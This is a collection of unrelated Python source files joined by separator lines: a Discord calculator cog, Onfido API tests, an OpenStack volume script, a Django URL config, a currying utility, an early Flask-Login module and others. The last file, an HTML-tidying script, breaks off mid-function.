"sin" : math.sin,
"cos" : math.cos,
"tan" : math.tan,
"abs" : abs,
"trunc" : lambda a: int(a),
"round" : round,
"sgn" : lambda a: abs(a)>epsilon and cmp(a,0) or 0}
def evaluateStack(self, s):
op = s.pop()
if op == 'unary -':
return -self.evaluateStack(s)
if op in "+-*/^":
op2 = self.evaluateStack(s)
op1 = self.evaluateStack(s)
return self.opn[op](op1, op2)
elif op == "PI":
return math.pi # 3.1415926535
elif op == "E":
return math.e # 2.718281828
elif op in self.fn:
return self.fn[op](self.evaluateStack(s))
elif op[0].isalpha():
return 0
else:
return float(op)
def eval(self,num_string,parseAll=True):
self.exprStack=[]
results=self.bnf.parseString(num_string,parseAll)
val=self.evaluateStack(self.exprStack[:])
return val
class Calculator:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot):
self.bot = bot
self.nsp=NumericStringParserForPython3()
self.user_color = discord.Colour(0xed791d) ## orange
self.mod_color = discord.Colour(0x7289da) ## blurple
@commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
async def calc(self, ctx, *, formula = None):
""" ✔ Do some math
thanks to Paul McGuire's fourFn.py. """
person = ctx.message.author
formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
.replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
.replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
.replace('π', 'PI').replace('÷', '/')
if formula == None:
# How can it calculate an empty message? Reee!
msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
e = discord.Embed(color=self.user_color)
e.description = msg
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
await ctx.send(msg, delete_after=23)
return
try:
answer=self.nsp.eval(formula)
except:
# If there's a problem in the input, show examples
msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
e = discord.Embed(color=self.user_color)
e.description = f'\u200B{msg}'
e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
e.add_field(name='substract', value='`91 - 35 minus 3 sub 12`')
e.add_field(name='exponential', value="`7 ^ 5`")
e.add_field(name='Supported formulas',
value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
await ctx.send(error, delete_after=23)
return
# Correct input prints correct answer
distance = self.bot or self.bot.message
duration = f'Calculated in {distance.ws.latency * 1000:.2f} ms'
success = round(answer, 2)
e = discord.Embed(color=self.user_color)
e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
e.set_footer(text=duration)
try:
await ctx.send(embed=e)
except discord.Forbidden: # FORBIDDEN (status code: 403): Missing Permissions
await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
bot.add_cog(Calculator(bot))
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
sample_file = open("sample_photo.png", "rb")
request_body = {"advanced_validation": "true"}
api.live_photo.upload(sample_file, request_body)
assert mock_upload.called is True
def test_find_live_photo(requests_mock):
mock_find = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}", json=[])
api.live_photo.find(fake_uuid)
assert mock_find.called is True
def test_list_live_photos(requests_mock):
mock_list = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}", json=[])
api.live_photo.all(fake_uuid)
assert mock_list.called is True
def test_download_live_photo(requests_mock):
mock_download = requests_mock.get(f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download", text="FAKE IMAGE BINARY", headers={"Content-type": "image/png"})
onfido_download = api.live_photo.download(fake_uuid)
assert mock_download.called is True
assert onfido_download.content_type == "image/png"
|
#import OpenStack connection class from the SDK
from openstack import connection
# Create a connection object by calling the constructor and pass the security information
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def create_volume(conn):
volume_properties = {'size':'2', 'name':'packtpub-volume-2'}
volume = conn.block_store.create_volume(**volume_properties)
def delete_volume(conn):
volume_id = "3b064701-aaa7-418a-9df7-cad52bd549ee"
conn.block_store.delete_volume(volume_id)
def create_snapshot(conn):
snapshot_properties = {'volume_id':'3b064701-aaa7-418a-9df7-cad52bd549ee'}
snapshot = conn.block_store.create_snapshot(**snapshot_properties)
def delete_snapshot(conn):
snapshot_id = "91ac5916-0baa-469e-ac4e-e37b2a3880dc"
conn.block_store.delete_snapshot(snapshot_id)
#create_snapshot(conn)
#delete_snapshot(conn)
#delete_volume(conn)
create_volume(conn)
|
# -*- coding: utf-8 -*-
"""Top-level package for {{ cookiecutter.project_name }}"""
__version__ = '0.0.1'
|
np.tanh(x)
|
import asyncio
import aioredis
async def main():
sentinel = await aioredis.create_sentinel(
["redis://localhost:26379", "redis://sentinel2:26379"]
)
redis = sentinel.master_for("mymaster")
ok = await redis.set("key", "value")
assert ok
val = await redis.get("key", encoding="utf-8")
assert val == "value"
asyncio.run(main())
|
import logging
from .DatabaseBase import DatabaseBase
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG)
class ImageResource(DatabaseBase):
def __init__(self):
super().__init__()
def get_product_images_by_id(self, id):
search_image_query = """Select * From images where productId = %s """
values = [id]
image_records = self.run_query(search_image_query, values, False)
return image_records
def get_threed_link_by_product_id(self, pid):
select_query = """ Select * from images where is3DModelType = 'Y' and productId = %s"""
values = [str(pid)]
records = self.run_query(select_query, values, True)
if records is None:
return None
return records[0]
def update_threed_link(self, url, id_list):
update_query = """UPDATE images SET threeDModelLocation = %s WHERE productId =%s and is3DModelType = 'Y' """
for id in id_list:
self.run_query(update_query, [url, id], False)
def insert_threed_model(self, url, id_list):
insert_query = """INSERT INTO images(threeDModelLocation, is3DModelType, productId) VALUES (%s, %s, %s)"""
values = []
for id in id_list:
temp = (url, 'Y', str(id))
values.append(temp)
try:
self.run_query_many(insert_query, values, True)
except Exception as e:
self.connection.rollback()
logger.error('Exception occurred when inserting order', e)
return 0
return 1
|
"""weather_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.views.generic import RedirectView
urlpatterns = [
url(r'^$', RedirectView.as_view(url='https://github.com/brian-duffy/yoyo-test/blob/master/README.md')),
url(r'weather_app/', include('weather_app.urls')),
]
|
"""Utility for currying functions."""
from functools import wraps
from inspect import signature, isbuiltin, isclass
def curry(func, args=None, kwargs=None, n=None, use_defaults=False):
if use_defaults:
return CurriedDefault(func, args, kwargs, n)
return Curried(func, args, kwargs, n)
class Curried:
def __init__(self, func, args=None, kwargs=None, target_arg_count=None):
if not callable(func):
raise TypeError('first argument must be callable')
wraps(func)(self)
self.func = func
self.args = or_else(args, tuple())
self.kwargs = or_else(kwargs, dict())
self.target_arg_count = or_else(target_arg_count, get_target_arg_count(func))
def __call__(self, *new_args, **new_kwargs):
args = self.args + new_args
kwargs = self.kwargs.copy()
kwargs.update(new_kwargs)
if self._have_enough_args(args, kwargs):
return self.func(*args, **kwargs)
return self._clone(args, kwargs)
def _clone(self, args, kwargs):
return Curried(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
return current_count(args, kwargs) == self.target_arg_count
class CurriedDefault(Curried):
def _clone(self, args, kwargs):
return CurriedDefault(self.func, args, kwargs, self.target_arg_count)
def _have_enough_args(self, args, kwargs):
count = current_count(args, kwargs)
return count == self.target_arg_count or count == (self.target_arg_count - count_defaults(self.func))
def or_else(x, default):
return x if x is not None else default
def current_count(next_args, next_kwargs):
return len(next_args) + len(next_kwargs)
def count_defaults(func):
length = 0
if func.__defaults__ is not None:
length += len(func.__defaults__)
if func.__kwdefaults__ is not None:
length += len(func.__kwdefaults__)
return length
def get_target_arg_count(func):
if isclass(func) or isbuiltin(func):
# builtins, e.g. `map`, refer to class rather than fn
func = func.__call__
sig = signature(func)
return len(sig.parameters)
|
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Obsolete module: moved to `local.download_url`
"""
import warnings
warnings.warn(
"DownloadURL has been moved to datalad.local.download_url. "
"This module was deprecated in 0.16.0, and will be removed in a future "
"release. Please adjust the import.",
DeprecationWarning)
# Import command class to ease 3rd-party transitions
from datalad.local.download_url import DownloadURL
|
# -*- coding: utf-8 -*-
'''
flask.ext.login
---------------
This module provides user session management for Flask. It lets you log
your users in and out in a database-independent manner.
:copyright: (c) 2011 by Matthew Frazier.
:license: MIT/X11, see LICENSE for more details.
'''
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3': # pragma: no cover
from urlparse import urlparse, urlunparse
else: # pragma: no cover
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
#: A proxy for the current user. If no user is logged in, this will be an
#: anonymous user
current_user = LocalProxy(lambda: _get_user())
#: The default name of the "remember me" cookie (``remember_token``)
COOKIE_NAME = 'remember_token'
#: The default time before the "remember me" cookie expires (365 days).
COOKIE_DURATION = timedelta(days=365)
#: Whether the "remember me" cookie requires Secure; defaults to ``None``
COOKIE_SECURE = None
#: Whether the "remember me" cookie uses HttpOnly or not; defaults to ``False``
COOKIE_HTTPONLY = False
#: The default flash message to display when users need to log in.
LOGIN_MESSAGE = u'Please log in to access this page.'
#: The default flash message category to display when users need to log in.
LOGIN_MESSAGE_CATEGORY = 'message'
#: The default flash message to display when users need to reauthenticate.
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
#: The default flash message category to display when users need to
#: reauthenticate.
REFRESH_MESSAGE_CATEGORY = 'message'
#: The default attribute to retreive the unicode id of the user
ID_ATTRIBUTE = 'get_id'
#: Default name of the auth header (``Authorization``)
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
'''
This object is used to hold the settings used for logging in. Instances of
:class:`LoginManager` are *not* bound to specific apps, so you can create
one in the main body of your code and then bind it to your
app in a factory function.
'''
def __init__(self, app=None, add_context_processor=True):
#: A class or factory function that produces an anonymous user, which
#: is used when no one is logged in.
self.anonymous_user = AnonymousUserMixin
#: The name of the view to redirect to when the user needs to log in.
#: (This can be an absolute URL as well, if your authentication
#: machinery is external to your application.)
self.login_view = None
#: The message to flash when a user is redirected to the login page.
self.login_message = LOGIN_MESSAGE
#: The message category to flash when a user is redirected to the login
#: page.
self.login_message_category = LOGIN_MESSAGE_CATEGORY
#: The name of the view to redirect to when the user needs to
#: reauthenticate.
self.refresh_view = None
#: The message to flash when a user is redirected to the 'needs
#: refresh' page.
self.needs_refresh_message = REFRESH_MESSAGE
#: The message category to flash when a user is redirected to the
#: 'needs refresh' page.
self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
#: The mode to use session protection in. This can be either
#: ``'basic'`` (the default) or ``'strong'``, or ``None`` to disable
#: it.
self.session_protection = 'basic'
#: If present, used to translate flash messages ``self.login_message``
#: and ``self.needs_refresh_message``
self.localize_callback = None
self.token_callback = None
self.user_callback = None
self.unauthorized_callback = None
self.needs_refresh_callback = None
self.id_attribute = ID_ATTRIBUTE
self.header_callback = None
self.request_callback = None
if app is not None:
self.init_app(app, add_context_processor)
def setup_app(self, app, add_context_processor=True): # pragma: no cover
'''
This method has been deprecated. Please use
:meth:`LoginManager.init_app` instead.
'''
warnings.warn('Warning setup_app is deprecated. Please use init_app.',
DeprecationWarning)
self.init_app(app, add_context_processor)
def init_app(self, app, add_context_processor=True):
'''
Configures an application. This registers an `after_request` call, and
attaches this `LoginManager` to it as `app.login_manager`.
:param app: The :class:`flask.Flask` object to configure.
:type app: :class:`flask.Flask`
:param add_context_processor: Whether to add a context processor to
the app that adds a `current_user` variable to the template.
Defaults to ``True``.
:type add_context_processor: bool
'''
app.login_manager = self
app.after_request(self._update_remember_cookie)
self._login_disabled = app.config.get('LOGIN_DISABLED',
app.config.get('TESTING', False))
if add_context_processor:
app.context_processor(_user_context_processor)
def unauthorized(self):
'''
This is called when the user is required to log in. If you register a
callback with :meth:`LoginManager.unauthorized_handler`, then it will
be called. Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.login_message` to the user.
- Redirect the user to `login_view`. (The page they were attempting
to access will be passed in the ``next`` query string variable,
so you can redirect there if present instead of the homepage.)
If :attr:`LoginManager.login_view` is not defined, then it will simply
raise a HTTP 401 (Unauthorized) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_unauthorized.send(current_app._get_current_object())
if self.unauthorized_callback:
return self.unauthorized_callback()
if not self.login_view:
abort(401)
if self.login_message:
if self.localize_callback is not None:
flash(self.localize_callback(self.login_message),
category=self.login_message_category)
else:
flash(self.login_message, category=self.login_message_category)
return redirect(login_url(self.login_view, request.url))
def user_loader(self, callback):
'''
This sets the callback for reloading a user from the session. The
function you set should take a user ID (a ``unicode``) and return a
user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.user_callback = callback
return callback
def header_loader(self, callback):
'''
This sets the callback for loading a user from a header value.
The function you set should take an authentication token and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.header_callback = callback
return callback
def request_loader(self, callback):
'''
This sets the callback for loading a user from a Flask request.
The function you set should take Flask request object and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.request_callback = callback
return callback
def token_loader(self, callback):
'''
This sets the callback for loading a user from an authentication
token. The function you set should take an authentication token
(a ``unicode``, as returned by a user's `get_auth_token` method) and
return a user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.token_callback = callback
return callback
def unauthorized_handler(self, callback):
'''
This will set the callback for the `unauthorized` method, which among
other things is used by `login_required`. It takes no arguments, and
should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.unauthorized_callback = callback
return callback
def needs_refresh_handler(self, callback):
'''
This will set the callback for the `needs_refresh` method, which among
other things is used by `fresh_login_required`. It takes no arguments,
and should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.needs_refresh_callback = callback
return callback
def needs_refresh(self):
'''
This is called when the user is logged in, but they need to be
reauthenticated because their session is stale. If you register a
callback with `needs_refresh_handler`, then it will be called.
Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.needs_refresh_message` to the user.
- Redirect the user to :attr:`LoginManager.refresh_view`. (The page
they were attempting to access will be passed in the ``next``
query string variable, so you can redirect there if present
instead of the homepage.)
If :attr:`LoginManager.refresh_view` is not defined, then it will
simply raise a HTTP 403 (Forbidden) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_needs_refresh.send(current_app._get_current_object())
if self.needs_refresh_callback:
return self.needs_refresh_callback()
if not self.refresh_view:
abort(403)
if self.localize_callback is not None:
flash(self.localize_callback(self.needs_refresh_message),
category=self.needs_refresh_message_category)
else:
flash(self.needs_refresh_message,
category=self.needs_refresh_message_category)
return redirect(login_url(self.refresh_view, request.url))
def reload_user(self, user=None):
ctx = _request_ctx_stack.top
if user is None:
user_id = session.get('user_id')
if user_id is None:
ctx.user = self.anonymous_user()
else:
user = self.user_callback(user_id)
if user is None:
logout_user()
else:
ctx.user = user
else:
ctx.user = user
def _load_user(self):
'''Loads user from session or remember_me cookie as applicable'''
user_accessed.send(current_app._get_current_object())
# first check SESSION_PROTECTION
config = current_app.config
if config.get('SESSION_PROTECTION', self.session_protection):
deleted = self._session_protection()
if deleted:
return self.reload_user()
# If a remember cookie is set, and the session is not, move the
# cookie user ID to the session.
#
# However, the session may have been set if the user has been
# logged out on this request, 'remember' would be set to clear,
# so we should check for that and not restore the session.
is_missing_user_id = 'user_id' not in session
if is_missing_user_id:
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
has_cookie = (cookie_name in request.cookies and
session.get('remember') != 'clear')
if has_cookie:
return self._load_from_cookie(request.cookies[cookie_name])
elif header_name in request.headers:
return self._load_from_header(request.headers[header_name])
else:
return self._load_from_request(request)
return self.reload_user()
def _session_protection(self):
sess = session._get_current_object()
ident = _create_identifier()
app = current_app._get_current_object()
mode = app.config.get('SESSION_PROTECTION', self.session_protection)
# if there is no '_id', then take the current one for good
if '_id' not in sess:
sess['_id'] = ident
# if the sess is empty, it's an anonymous user, or just logged out
# so we can skip this, unless 'strong' protection is active,
# in which case we need to double check for the remember me token
check_protection = sess or mode == 'strong'
if check_protection and ident != sess.get('_id', None):
if mode == 'basic' or sess.permanent:
sess['_fresh'] = False
session_protected.send(app)
return False
elif mode == 'strong':
sess.clear()
sess['remember'] = 'clear'
session_protected.send(app)
return True
return False
def _load_from_cookie(self, cookie):
if self.token_callback:
user = self.token_callback(cookie)
if user is not None:
session['user_id'] = getattr(user, self.id_attribute)()
session['_fresh'] = False
_request_ctx_stack.top.user = user
else:
self.reload_user()
else:
user_id = decode_cookie(cookie)
if user_id is not None:
session['user_id'] = user_id
session['_fresh'] = False
self.reload_user()
if _request_ctx_stack.top.user is not None:
app = current_app._get_current_object()
user_loaded_from_cookie.send(app, user=_get_user())
def _load_from_header(self, header):
user = None
if self.header_callback:
user = self.header_callback(header)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_header.send(app, user=_get_user())
else:
self.reload_user()
def _load_from_request(self, request):
user = None
if self.request_callback:
user = self.request_callback(request)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_request.send(app, user=_get_user())
else:
self.reload_user()
def _update_remember_cookie(self, response):
# Don't modify the session unless there's something to do.
if 'remember' in session:
operation = session.pop('remember', None)
if operation == 'set' and 'user_id' in session:
self._set_cookie(response)
elif operation == 'clear':
self._clear_cookie(response)
return response
def _set_cookie(self, response):
# cookie settings
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
# prepare data
if self.token_callback:
data = current_user.get_auth_token()
else:
data = encode_cookie(str(session['user_id']))
expires = datetime.utcnow() + duration
# actually set it
response.set_cookie(cookie_name,
value=data,
expires=expires,
domain=domain,
secure=secure,
httponly=httponly)
def _clear_cookie(self, response):
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
'''
This provides default implementations for the methods that Flask-Login
expects user objects to have.
'''
def is_active(self):
return True
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id)
except AttributeError:
raise NotImplementedError('No `id` attribute - override `get_id`')
def __eq__(self, other):
'''
Checks the equality of two `UserMixin` objects using `get_id`.
'''
if isinstance(other, UserMixin):
return self.get_id() == other.get_id()
return NotImplemented
def __ne__(self, other):
'''
Checks the inequality of two `UserMixin` objects using `get_id`.
'''
equal = self.__eq__(other)
if equal is NotImplemented:
return NotImplemented
return not equal
if sys.version_info[0] != 2: # pragma: no cover
# Python 3 implicitly set __hash__ to None if we override __eq__
# We set it back to its default implementation
__hash__ = object.__hash__
class AnonymousUserMixin(object):
'''
This is the default object for representing an anonymous user.
'''
def is_authenticated(self):
return False
def is_active(self):
return False
def is_anonymous(self):
return True
def get_id(self):
return
def encode_cookie(payload):
'''
This will encode a ``unicode`` value into a cookie, and sign that cookie
with the app's secret key.
:param payload: The value to encode, as `unicode`.
:type payload: unicode
'''
return u'{0}|{1}'.format(payload, _cookie_digest(payload))
def decode_cookie(cookie):
'''
This decodes a cookie given by `encode_cookie`. If verification of the
cookie fails, ``None`` will be implicitly returned.
:param cookie: An encoded cookie.
:type cookie: str
'''
try:
payload, digest = cookie.rsplit(u'|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii') # pragma: no cover
except ValueError:
return
if safe_str_cmp(_cookie_digest(payload), digest):
return payload
def make_next_param(login_url, current_url):
'''
Reduces the scheme and host from a given URL so it can be passed to
the given `login` URL more efficiently.
:param login_url: The login URL being redirected to.
:type login_url: str
:param current_url: The URL to reduce.
:type current_url: str
'''
l = urlparse(login_url)
c = urlparse(current_url)
if (not l.scheme or l.scheme == c.scheme) and \
(not l.netloc or l.netloc == c.netloc):
return urlunparse(('', '', c.path, c.params, c.query, ''))
return current_url
def login_url(login_view, next_url=None, next_field='next'):
'''
Creates a URL for redirecting to a login page. If only `login_view` is
provided, this will just return the URL for it. If `next_url` is provided,
however, this will append a ``next=URL`` parameter to the query string
so that the login view can redirect back to that URL.
:param login_view: The name of the login view. (Alternately, the actual
URL to the login view.)
:type login_view: str
:param next_url: The URL to give the login view for redirection.
:type next_url: str
:param next_field: What field to store the next URL in. (It defaults to
``next``.)
:type next_field: str
'''
if login_view.startswith(('https://', 'http://', '/')):
base = login_view
else:
base = url_for(login_view)
if next_url is None:
return base
parts = list(urlparse(base))
md = url_decode(parts[4])
md[next_field] = make_next_param(base, next_url)
parts[4] = url_encode(md, sort=True)
return urlunparse(parts)
def make_secure_token(*args, **options):
'''
This will create a secure token that you can use as an authentication
token for your users. It uses heavy-duty HMAC encryption to prevent people
from guessing the information. (To make it even more effective, if you
will never need to regenerate the token, you can pass some random data
as one of the arguments.)
:param \*args: The data to include in the token.
:type args: args
:param \*\*options: To manually specify a secret key, pass ``key=THE_KEY``.
Otherwise, the ``current_app`` secret key will be used.
:type \*\*options: kwargs
'''
key = options.get('key')
key = _secret_key(key)
l = [s if isinstance(s, bytes) else s.encode('utf-8') for s in args]
payload = b'\0'.join(l)
token_value = hmac.new(key, payload, sha1).hexdigest()
if hasattr(token_value, 'decode'): # pragma: no cover
token_value = token_value.decode('utf-8') # ensure bytes
return token_value
def login_fresh():
'''
This returns ``True`` if the current login is fresh.
'''
return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
'''
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` method returns ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
'''
if not force and not user.is_active():
return False
user_id = getattr(user, current_app.login_manager.id_attribute)()
session['user_id'] = user_id
session['_fresh'] = True
session['_id'] = _create_identifier()
if remember:
session['remember'] = 'set'
_request_ctx_stack.top.user = user
user_logged_in.send(current_app._get_current_object(), user=_get_user())
return True
def logout_user():
'''
Logs a user out. (You do not need to pass the actual user.) This will
also clean up the remember me cookie if it exists.
'''
if 'user_id' in session:
session.pop('user_id')
if '_fresh' in session:
session.pop('_fresh')
cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
if cookie_name in request.cookies:
session['remember'] = 'clear'
user = _get_user()
if user and not user.is_anonymous():
user_logged_out.send(current_app._get_current_object(), user=user)
current_app.login_manager.reload_user()
return True
def confirm_login():
'''
This sets the current session as fresh. Sessions become stale when they
are reloaded from a cookie.
'''
session['_fresh'] = True
session['_id'] = _create_identifier()
user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
'''
If you decorate a view with this, it will ensure that the current user is
logged in and authenticated before calling the actual view. (If they are
not, it calls the :attr:`LoginManager.unauthorized` callback.) For
example::
@app.route('/post')
@login_required
def post():
pass
If there are only certain times you need to require that your user is
logged in, you can do so with::
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
...which is essentially the code that this function adds to your views.
It can be convenient to globally turn off authentication when unit
testing. To enable this, if either of the application
configuration variables `LOGIN_DISABLED` or `TESTING` is set to
`True`, this decorator will be ignored.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
return func(*args, **kwargs)
return decorated_view
def fresh_login_required(func):
'''
If you decorate a view with this, it will ensure that the current user's
login is fresh - i.e. there session was not restored from a 'remember me'
cookie. Sensitive operations, like changing a password or e-mail, should
be protected with this, to impede the efforts of cookie thieves.
If the user is not authenticated, :meth:`LoginManager.unauthorized` is
called as normal. If they are authenticated, but their session is not
fresh, it will call :meth:`LoginManager.needs_refresh` instead. (In that
case, you will need to provide a :attr:`LoginManager.refresh_view`.)
Behaves identically to the :func:`login_required` decorator with respect
to configutation variables.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
elif not login_fresh():
return current_app.login_manager.needs_refresh()
return func(*args, **kwargs)
return decorated_view
def _get_user():
if has_request_context() and not hasattr(_request_ctx_stack.top, 'user'):
current_app.login_manager._load_user()
return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
key = _secret_key(key)
return hmac.new(key, payload.encode('utf-8'), sha1).hexdigest()
def _get_remote_addr():
address = request.headers.get('X-Forwarded-For', request.remote_addr)
if address is not None:
address = address.encode('utf-8')
return address
def _create_identifier():
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
if str is bytes:
base = unicode(base, 'utf-8', errors='replace') # pragma: no cover
h = md5()
h.update(base.encode('utf8'))
return h.hexdigest()
def _user_context_processor():
return dict(current_user=_get_user())
def _secret_key(key=None):
if key is None:
key = current_app.config['SECRET_KEY']
if isinstance(key, unicode): # pragma: no cover
key = key.encode('latin1') # ensure bytes
return key
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
#: called for a normal login.)
#: It receives no additional arguments besides the app.
user_login_confirmed = _signals.signal('login-confirmed')
#: Sent when the `unauthorized` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_unauthorized = _signals.signal('unauthorized')
#: Sent when the `needs_refresh` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_needs_refresh = _signals.signal('needs-refresh')
#: Sent whenever the user is accessed/loaded
#: receives no additional arguments besides the app.
user_accessed = _signals.signal('accessed')
#: Sent whenever session protection takes effect, and a session is either
#: marked non-fresh or deleted. It receives no additional arguments besides
#: the app.
session_protected = _signals.signal('session-protected')
|
#!/usr/bin/env python
##
# Python script to tidy mediasession.bs
#
# adapted from: https://github.com/w3c/webvtt/blob/41cac9c211f9c581de466bb9b8b5dd11a160ffad/format.py
##
import re
import sys
# http://stackoverflow.com/q/1732348
pattern = re.compile(r'<(\w+).*?>|</(\w+)>|<!--(.*?)-->', re.DOTALL)
INDENT = ' '
COLUMNS = 80
def hasendtag(name):
return name not in ['br', 'img', 'meta']
def tokenize(source):
offset = 0
for match in pattern.finditer(source):
if match.start() > offset:
yield ('text', offset, match.start(), None)
index = match.lastindex
token = ('open', 'close', 'comment')[index - 1]
